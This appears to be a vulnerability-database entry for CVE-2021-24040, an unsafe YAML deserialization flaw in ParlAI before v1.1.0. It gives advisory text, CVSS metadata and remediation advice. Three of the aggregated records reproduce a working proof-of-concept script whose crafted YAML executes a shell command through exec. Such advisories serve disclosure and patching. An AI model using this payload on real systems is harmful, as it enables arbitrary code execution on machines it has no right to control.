Description
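Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. This issue affects ParlAI prior to v1.1.0. The weakness is classified as CWE-502 (deserialization of untrusted data). The stated precondition is write access to a YAML configuration file that ParlAI parses, whereas the CVSS vectors recorded for this entry (AV:N with no privileges or authentication required) rate it as network-exploitable; when prioritising, check who can actually write or supply configuration files in your deployment, including shared checkouts, CI workspaces and configuration obtained from third parties. Remediation is to upgrade to v1.1.0 or later; more generally, YAML from any source outside your control should be parsed with a safe loader (for example PyYAML's `yaml.safe_load`) rather than one that can construct arbitrary Python objects.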
Affected Software
Related
{"id": "CVE-2021-24040", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24040", "description": "Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. This issue affects ParlAI prior to v1.1.0.", "published": "2021-09-10T22:15:00", "modified": "2021-09-24T03:06:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24040", "reporter": "cve-assign@fb.com", "references": ["https://github.com/facebookresearch/ParlAI/releases/tag/v1.1.0", "https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg", "http://packetstormsecurity.com/files/164136/Facebook-ParlAI-1.0.0-Code-Execution-Deserialization.html"], "cvelist": ["CVE-2021-24040"], "immutableFields": [], "lastseen": "2022-03-23T14:45:36", "viewCount": 63, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": 
["EDB-ID:50289"]}, {"type": "github", "idList": ["GHSA-MWGJ-7X7J-6966"]}, {"type": "osv", "idList": ["OSV:GHSA-MWGJ-7X7J-6966"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164136"]}, {"type": "zdt", "idList": ["1337DAY-ID-36749"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50289"]}, {"type": "github", "idList": ["GHSA-M87F-9FVV-2MGG", "GHSA-MWGJ-7X7J-6966"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164136"]}, {"type": "zdt", "idList": ["1337DAY-ID-36749"]}]}, "exploitation": null, "vulnersScore": 5.2}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-502"], "affectedSoftware": [{"cpeName": "facebook:parlai", "version": "1.1.0", "operator": "lt", "name": "facebook parlai"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:facebook:parlai:1.1.0:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.0", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/facebookresearch/ParlAI/releases/tag/v1.1.0", "name": "https://github.com/facebookresearch/ParlAI/releases/tag/v1.1.0", "refsource": "MISC", "tags": ["Release Notes", "Third Party Advisory"]}, {"url": "https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg", "name": "https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg", "refsource": "CONFIRM", "tags": ["Patch", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/164136/Facebook-ParlAI-1.0.0-Code-Execution-Deserialization.html", "name": "http://packetstormsecurity.com/files/164136/Facebook-ParlAI-1.0.0-Code-Execution-Deserialization.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"github": [{"lastseen": "2021-12-22T11:51:52", "description": "Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. This issue affects ParlAI prior to v1.1.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T20:06:14", "type": "github", "title": "Deserialization of Untrusted Data in ParlAI", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24040"], "modified": "2021-09-15T18:26:36", "id": "GHSA-MWGJ-7X7J-6966", "href": "https://github.com/advisories/GHSA-mwgj-7x7j-6966", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-09-14T16:08:30", "description": "", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "packetstorm", "title": "Facebook ParlAI 1.0.0 Code Execution / Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24040"], "modified": "2021-09-14T00:00:00", "id": "PACKETSTORM:164136", "href": 
"https://packetstormsecurity.com/files/164136/Facebook-ParlAI-1.0.0-Code-Execution-Deserialization.html", "sourceData": "`# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai \n# Date: 2021-09-11 \n# Exploit Author: Abhiram V \n# Vendor Homepage: https://parl.ai/ \n# Software Link: https://github.com/facebookresearch/ParlAI \n# Version: < 1.1.0 \n# Tested on: Linux \n# CVE: CVE-2021-24040 \n# References : \n# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg \n# | https://anon-artist.github.io/blogs/blog3.html | \n \n############################################################################ \n \nIntroduction \nParlAI (pronounced \u201cpar-lay\u201d) is a free, open-source python framework for \nsharing, training and evaluating AI models on a variety of openly available \ndialogue datasets. \n \n############################################################################ \n \nVulnerability details \n \n############################################################################ \n \nDescription \nParlAI was vulnerable to YAML deserialization attack caused by unsafe \nloading which leads to Arbitrary Code Execution. 
\n \nProof of Concept \n \nCreate the following PoC file (exploit.py) \n \nimport os \n#os.system('pip3 install parlai') \nfrom parlai.chat_service.utils import config \nexploit = \"\"\"!!python/object/new:type \nargs: [\"z\", !!python/tuple [], {\"extend\": !!python/name:exec }] \nlistitems: \"__import__('os').system('xcalc')\" \n\"\"\" \nopen('config.yml','w+').write(exploit) \nconfig.parse_configuration_file('config.yml') \n \nExecute the python script ie, python3 exploit.py \n \nImpact \nCode Execution \n \n############################################################################ \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164136/facebookparlai1000-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2022-06-10T05:00:35", "description": "Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. 
This issue affects ParlAI prior to v1.1.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T20:06:14", "type": "osv", "title": "Deserialization of Untrusted Data in ParlAI", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24040"], "modified": "2022-06-10T02:15:12", "id": "OSV:GHSA-MWGJ-7X7J-6966", "href": "https://osv.dev/vulnerability/GHSA-mwgj-7x7j-6966", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T21:40:35", "description": "Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. 
This issue affects ParlAI prior to v1.1.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-10T22:15:00", "type": "osv", "title": "PYSEC-2021-330", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24040"], "modified": "2021-09-23T00:11:05", "id": "OSV:PYSEC-2021-330", "href": "https://osv.dev/vulnerability/PYSEC-2021-330", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-22T21:24:39", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T00:00:00", "type": "zdt", "title": "Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24040"], "modified": "2021-09-13T00:00:00", "id": "1337DAY-ID-36749", "href": "https://0day.today/exploit/description/36749", "sourceData": "# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai\n# Exploit Author: Abhiram V\n# Vendor Homepage: https://parl.ai/\n# Software Link: https://github.com/facebookresearch/ParlAI\n# Version: < 1.1.0\n# Tested on: Linux\n# CVE: CVE-2021-24040\n# References : \n# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg\n# | https://anon-artist.github.io/blogs/blog3.html |\n\n############################################################################\n\nIntroduction\nParlAI (pronounced \u201cpar-lay\u201d) is a free, open-source python framework for\nsharing, training and evaluating AI models on a variety of openly available\ndialogue datasets.\n\n############################################################################\n\nVulnerability details\n\n############################################################################\n\nDescription\nParlAI was vulnerable to YAML deserialization attack caused by unsafe\nloading which leads to Arbitrary Code Execution.\n\nProof of Concept\n\nCreate the following PoC file (exploit.py)\n\nimport os\n#os.system('pip3 install parlai')\nfrom parlai.chat_service.utils import config\nexploit = \"\"\"!!python/object/new:type\n args: [\"z\", !!python/tuple [], {\"extend\": !!python/name:exec }]\n listitems: 
\"__import__('os').system('xcalc')\"\n\"\"\"\nopen('config.yml','w+').write(exploit)\nconfig.parse_configuration_file('config.yml')\n\nExecute the python script ie, python3 exploit.py\n\nImpact\nCode Execution\n\n############################################################################\n", "sourceHref": "https://0day.today/exploit/36749", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:35:40", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T00:00:00", "type": "exploitdb", "title": "Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24040", "CVE-2021-24040"], "modified": "2021-09-13T00:00:00", "id": "EDB-ID:50289", "href": "https://www.exploit-db.com/exploits/50289", "sourceData": "# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai\r\n# Date: 2021-09-11\r\n# Exploit Author: Abhiram V\r\n# Vendor Homepage: https://parl.ai/\r\n# Software Link: https://github.com/facebookresearch/ParlAI\r\n# Version: < 
1.1.0\r\n# Tested on: Linux\r\n# CVE: CVE-2021-24040\r\n# References : \r\n# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg\r\n# | https://anon-artist.github.io/blogs/blog3.html |\r\n\r\n############################################################################\r\n\r\nIntroduction\r\nParlAI (pronounced \u201cpar-lay\u201d) is a free, open-source python framework for\r\nsharing, training and evaluating AI models on a variety of openly available\r\ndialogue datasets.\r\n\r\n############################################################################\r\n\r\nVulnerability details\r\n\r\n############################################################################\r\n\r\nDescription\r\nParlAI was vulnerable to YAML deserialization attack caused by unsafe\r\nloading which leads to Arbitrary Code Execution.\r\n\r\nProof of Concept\r\n\r\nCreate the following PoC file (exploit.py)\r\n\r\nimport os\r\n#os.system('pip3 install parlai')\r\nfrom parlai.chat_service.utils import config\r\nexploit = \"\"\"!!python/object/new:type\r\n args: [\"z\", !!python/tuple [], {\"extend\": !!python/name:exec }]\r\n listitems: \"__import__('os').system('xcalc')\"\r\n\"\"\"\r\nopen('config.yml','w+').write(exploit)\r\nconfig.parse_configuration_file('config.yml')\r\n\r\nExecute the python script ie, python3 exploit.py\r\n\r\nImpact\r\nCode Execution\r\n\r\n############################################################################", "sourceHref": "https://www.exploit-db.com/download/50289", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}